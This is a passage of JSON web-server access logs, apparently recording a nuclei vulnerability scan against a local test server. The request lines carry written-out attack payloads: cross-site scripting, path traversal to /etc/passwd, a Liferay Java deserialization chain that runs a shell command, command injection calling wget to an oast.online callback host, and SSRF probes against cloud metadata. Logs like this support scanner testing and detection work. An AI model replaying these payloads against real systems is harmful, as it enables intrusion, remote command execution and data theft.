"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /healthz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Forms/rpAuth_1?id=
HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"297MbEpnBgO0RBKhkVSw7yAHjDA","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://c9v8hs0smpv8c6ag07h0riw1ks3pxgt4c.oast.online)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c9v8hs0smpv8c6ag07h0k8ptrh39rzmxf.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.168","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, 